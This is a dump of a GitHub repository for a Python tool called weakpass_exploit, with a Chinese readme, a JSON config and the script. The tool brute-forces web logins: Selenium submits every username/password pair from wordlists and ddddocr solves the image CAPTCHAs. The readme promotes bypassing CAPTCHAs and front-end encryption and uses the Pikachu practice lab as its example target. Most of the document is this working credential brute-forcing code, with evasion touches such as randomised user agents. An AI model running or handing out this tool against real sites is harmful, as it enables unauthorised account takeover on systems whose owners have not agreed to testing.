├── conf.json ├── images ├── regex_login_fail_res.png ├── regex_verify_res.png ├── use_eg.png └── xpath.png ├── readme.md └── weakpass_exploit.py /conf.json: -------------------------------------------------------------------------------- 1 | { 2 | "url": "http://192.168.86.186/pikachu-master/vul/burteforce/bf_server.php", 3 | "driver_path": "D:/python3/chromedriver.exe", 4 | "user_xpath": "//*[@id=\"main-container\"]/div[2]/div/div[2]/div/div/form/label[1]/span/input", 5 | "pass_xpath": "//*[@id=\"main-container\"]/div[2]/div/div[2]/div/div/form/label[2]/span/input", 6 | "orc_input_xpath": "//*[@id=\"main-container\"]/div[2]/div/div[2]/div/div/form/label[3]/span/input", 7 | "orc_xpath": "//*[@id=\"main-container\"]/div[2]/div/div[2]/div/div/form/label[4]/img", 8 | "login_button_xpath": "//*[@id=\"main-container\"]/div[2]/div/div[2]/div/div/form/div[2]/label/input", 9 | "regex_verify_res": "验证码输入错误哦", 10 | "regex_login_fail_res": "username or password is not exists" 11 | } 12 | -------------------------------------------------------------------------------- /images/regex_login_fail_res.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yxdnr/weakpass_exploit/ffc7f85135115035a77dd8dc354805eb3aab57e5/images/regex_login_fail_res.png -------------------------------------------------------------------------------- /images/regex_verify_res.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yxdnr/weakpass_exploit/ffc7f85135115035a77dd8dc354805eb3aab57e5/images/regex_verify_res.png -------------------------------------------------------------------------------- /images/use_eg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yxdnr/weakpass_exploit/ffc7f85135115035a77dd8dc354805eb3aab57e5/images/use_eg.png 
-------------------------------------------------------------------------------- /images/xpath.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yxdnr/weakpass_exploit/ffc7f85135115035a77dd8dc354805eb3aab57e5/images/xpath.png -------------------------------------------------------------------------------- /readme.md: -------------------------------------------------------------------------------- 1 | # weakpass_exploit 2 | 3 | 网站弱口令爆破小脚本 4 | 5 | 优点: 6 | 7 | - 绕过图形验证码 8 | - 绕过前端数据加密 9 | 10 | 不足: 11 | 12 | - ddddocr识别不够精确 13 | - 单线程 14 | 15 | 注: 本项目所有文件仅供学习和研究使用,请勿使用项目中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 16 | 17 | ## 更新 18 | 2023-12-21 更新了说明文档,对配置文件的字段进行了说明 19 | 20 | 2023-2-27 更新了说明文档,修改了部分代码 21 | 22 | 2023-2-3 优化了登录判断逻辑,现在会根据登陆成功或失败后跳转的页面进行检索,匹配关键字判断是否登录成功 23 | 24 | ## 安装 25 | 26 | python 3.7+ 27 | 28 | ddddocr 29 | 30 | selenium 31 | 32 | [chromedriver.exe](https://chromedriver.chromium.org/downloads) 33 | 34 | ``` 35 | 通过这个链接查看支持的版本: 36 | https://chromedriver.storage.googleapis.com/LATEST_RELEASE 37 | 通过这个链接下载需要的版本: 38 | https://chromedriver.chromium.org/downloads 39 | ``` 40 | 41 | ## 配置 42 | 43 | 在conf.json中,参照以下内容进行配置,以pikachu靶场为例 44 | 45 | 复制页面元素的XPath填入到conf.json中 46 | 47 | ![image-20221212155504710](images/xpath.png) 48 | 49 | 验证码错误时会提示 50 | 51 | ![image-20230227152427063](images/regex_verify_res.png) 52 | 53 | 用户名密码错误时会提示 54 | 55 | ![image-20230227152609239](images/regex_login_fail_res.png) 56 | 57 | 配置文件字段含义 58 | 59 | ``` 60 | url:登陆页面的URL 61 | driver_path:本地chromedriver程序的路径 62 | user_xpath:用户名输入框的xpath路径 63 | pass_xpath:密码输入框的xpath路径 64 | orc_input_xpath:验证码输入框的xpath路径 65 | orc_xpath:验证码的xpath路径 66 | login_button_xpath:登陆按钮的xpath路径 67 | regex_verify_res:验证码识别失败的提示语 68 | regex_login_fail_res:验证码识别成功但是账户或者口令错误的提示语 69 | ``` 70 | 71 | 配置完成如下: 72 | 73 | ```json 74 | { 75 | "url": "http://192.168.86.186/pikachu-master/vul/burteforce/bf_server.php", 76 | "driver_path": 
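"D:/python3/chromedriver.exe", 77 | "user_xpath": "//*[@id=\"main-container\"]/div[2]/div/div[2]/div/div/form/label[1]/span/input", 78 | "pass_xpath": "//*[@id=\"main-container\"]/div[2]/div/div[2]/div/div/form/label[2]/span/input", 79 | "orc_input_xpath": "//*[@id=\"main-container\"]/div[2]/div/div[2]/div/div/form/label[3]/span/input", 80 | "orc_xpath": "//*[@id=\"main-container\"]/div[2]/div/div[2]/div/div/form/label[4]/img", 81 | "login_button_xpath": "//*[@id=\"main-container\"]/div[2]/div/div[2]/div/div/form/div[2]/label/input", 82 | "regex_verify_res": "验证码输入错误哦", 83 | "regex_login_fail_res": "username or password is not exists" 84 | } 85 | ``` 86 | 87 | ## 使用 88 | 89 | 开始使用 90 | 91 | ``` 92 | Usage: usage weakpass_exploit.py -u -p -c 93 | 94 | Options: 95 | -h, --help show this help message and exit 96 | -u USERNAME_DICT Enter the username dict eg:user.txt 97 | -p PASSWORD_DICT Enter the password dict eg:pass.txt 98 | -c CONFIG_FILE Enter the config file eg:conf.json 99 | -e Use headless model eg: -e 100 | ``` 101 | 102 | ![image-20230227154440052](images/use_eg.png) 103 | -------------------------------------------------------------------------------- /weakpass_exploit.py: --------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
"""Dictionary-based login checker driven by a Selenium-controlled Chrome.

Every username/password pair from the two wordlists is typed into the login
form described in conf.json; the image CAPTCHA is read with ddddocr and the
outcome is classified by searching the response (page source, or the text of
a JavaScript alert) for the two failure strings from the config file.
"""
import ddddocr
from selenium import webdriver
from selenium.common.exceptions import NoAlertPresentException
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.chrome.options import Options
from random import randint
from colorama import init
import optparse
import time
import json

# Fallback chromedriver location (the value that used to be hard-coded in
# browser()); conf.json's "driver_path" takes precedence when present.
DEFAULT_DRIVER_PATH = "D:/python3/chromedriver.exe"


def login(driver, ocr, conf, username, password):
    """Submit one username/password pair and print the classified outcome.

    Args:
        driver: a live Selenium WebDriver positioned anywhere (the URL is
            loaded here).
        ocr: a ddddocr.DdddOcr instance used to read the CAPTCHA image.
        conf: the parsed conf.json dict (url, the element xpaths and the two
            match strings regex_verify_res / regex_login_fail_res).
        username, password: the credential pair to try.

    Returns:
        0 in every case; the result is only reported on stdout.

    Classification: regex_verify_res found -> CAPTCHA misread;
    regex_login_fail_res found -> wrong credentials; anything else -> reported
    as a successful login. Note that "anything else" includes unexpected
    pages (lockout notices, server errors), so a reported success should be
    confirmed manually.
    """
    driver.get(conf["url"])
    orc_img = driver.find_element(By.XPATH, conf["orc_xpath"])
    res = orc_identify(orc_img, ocr)
    regex_verify_res = conf["regex_verify_res"]
    regex_login_fail_res = conf["regex_login_fail_res"]
    driver.find_element(By.XPATH, conf["user_xpath"]).send_keys(username)
    driver.find_element(By.XPATH, conf["pass_xpath"]).send_keys(password)
    driver.find_element(By.XPATH, conf["orc_input_xpath"]).send_keys(res)
    driver.find_element(By.XPATH, conf["login_button_xpath"]).click()
    time.sleep(0.5)  # let the server answer before inspecting the result
    try:
        # Read the alert once. The previous code called alert_js() twice
        # (once to test, once to read), so an alert closed in between would
        # have raised.
        alert_text = alert_js(driver)
        if alert_text:
            html = alert_text
            driver.switch_to.alert.accept()
        else:
            html = driver.page_source
        if regex_verify_res in html:
            print("\033[0;31;40m[-]Verification code error : " + username + "/" + password + "\033[0m")
        elif regex_login_fail_res in html:
            print("\033[0;31;40m[-]login fail : " + username + "/" + password + "\033[0m")
        else:
            print("\033[1;32m[+]login success : " + username + "/" + password + "\033[0m")
        return 0
    except Exception as exc:
        # Best-effort: report and move on to the next pair (the bare except
        # that was here also swallowed KeyboardInterrupt and hid the cause).
        print("\033[0;31;40m[-]Error!!! {}: {}\033[0m".format(type(exc).__name__, exc))
        return 0


def orc_identify(orc_img, ocr):
    """Return ddddocr's reading of the CAPTCHA element *orc_img* as a string.

    The element screenshot is taken in memory via ``screenshot_as_png``
    instead of being written to ./image.png and read back, so no file is
    left in the working directory.
    """
    return ocr.classification(orc_img.screenshot_as_png)


def alert_js(driver):
    """Return the text of an open JavaScript alert, or False if none is open.

    Only the "no alert present" case is treated as False; any other driver
    error propagates to the caller.
    """
    try:
        return driver.switch_to.alert.text
    except NoAlertPresentException:
        return False


def browser(m, driver_path=None):
    """Start Chrome and return the configured WebDriver.

    Args:
        m: truthy -> run headless (the -e switch).
        driver_path: path to the chromedriver executable, normally
            conf.json's "driver_path". Falls back to DEFAULT_DRIVER_PATH when
            None or empty, which keeps the old one-argument call working.

    Returns:
        A selenium.webdriver.Chrome with a 15 s page-load timeout and a 15 s
        implicit wait for element lookups.
    """
    s = Service(driver_path or DEFAULT_DRIVER_PATH)
    chrome_ot = Options()
    if m:
        chrome_ot.add_argument("--headless")
    # NOTE(review): the original's indentation was lost; --incognito is
    # applied unconditionally here — confirm it was not meant to be
    # headless-only.
    chrome_ot.add_argument("--incognito")
    chrome_ot.add_argument('--user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/{} Safari/{}"'.format(randint(100,900),randint(200,300)))
    chrome_ot.add_argument("--disable-infobars")
    chrome_ot.add_argument("--disable-gpu")
    chrome_ot.add_argument("--ignore-certificate-errors")
    chrome_ot.add_experimental_option('excludeSwitches', ['enable-logging','DeprecationWarning'])
    drv = webdriver.Chrome(service=s, options=chrome_ot)
    # drv.maximize_window()  # optional: run the browser full screen
    drv.set_page_load_timeout(15)
    drv.implicitly_wait(15)
    return drv


def file_read(file):
    """Return all lines of *file* (trailing newlines kept) as a list.

    The handle is closed by the context manager (it used to be closed
    manually and would leak on a read error). The file is decoded as UTF-8,
    the same encoding used for conf.json.
    """
    with open(file, "r", encoding="utf-8") as f:
        return f.readlines()


def _load_conf(config_file):
    """Parse the JSON config file (UTF-8) and return it as a dict."""
    with open(config_file, "r", encoding="utf-8") as f:
        return json.load(f)


def run(user_list, pass_list, config_file, driver, ocr):
    """Try every username against every password, one pair at a time.

    Args:
        user_list, pass_list: lines as returned by file_read(); the trailing
            newline is stripped here, other whitespace is kept verbatim.
        config_file: path to conf.json; it is loaded here so the signature
            stays unchanged (main() loads it once more for the driver path).
        driver, ocr: see login().

    Returns:
        0 after the last pair has been tried.
    """
    print("\033[7;36m[*]running...\033[0m")
    conf = _load_conf(config_file)
    for user_line in user_list:
        user = user_line.strip("\n")
        for pass_line in pass_list:
            login(driver, ocr, conf, user, pass_line.strip("\n"))
    print("\033[7;36m[*]all done!\033[0m")
    return 0


def main():
    """Parse the command line, start the browser and run the wordlists.

    -u, -p and -c are all required; missing ones now produce a usage error
    instead of a TypeError from open(None). The wordlists and config are read
    before Chrome is launched, and the driver is always quit via finally.
    """
    init(autoreset=True)
    parser = optparse.OptionParser('usage %prog -u -p -c ')
    parser.add_option('-u', dest='username_dict', action='store', type='string', help='Enter the username dict eg:user.txt')
    parser.add_option('-p', dest='password_dict', action='store', type='string', help='Enter the password dict eg:pass.txt')
    parser.add_option('-c', dest='config_file', action='store', type='string', help='Enter the config file eg:conf.json')
    parser.add_option('-e', dest='model_setting', action='store_true', default=False, help='Use headless model eg: -e ')
    (options, _args) = parser.parse_args()
    if not (options.username_dict and options.password_dict and options.config_file):
        parser.error("-u, -p and -c are all required")
    config_file = options.config_file
    conf = _load_conf(config_file)
    user_list = file_read(options.username_dict)
    pass_list = file_read(options.password_dict)
    ocr = ddddocr.DdddOcr()
    driver = browser(options.model_setting, conf.get("driver_path"))
    try:
        run(user_list, pass_list, config_file, driver, ocr)
        time.sleep(1)
    finally:
        driver.quit()


if __name__ == "__main__":
    main()
--------------------------------------------------------------------------------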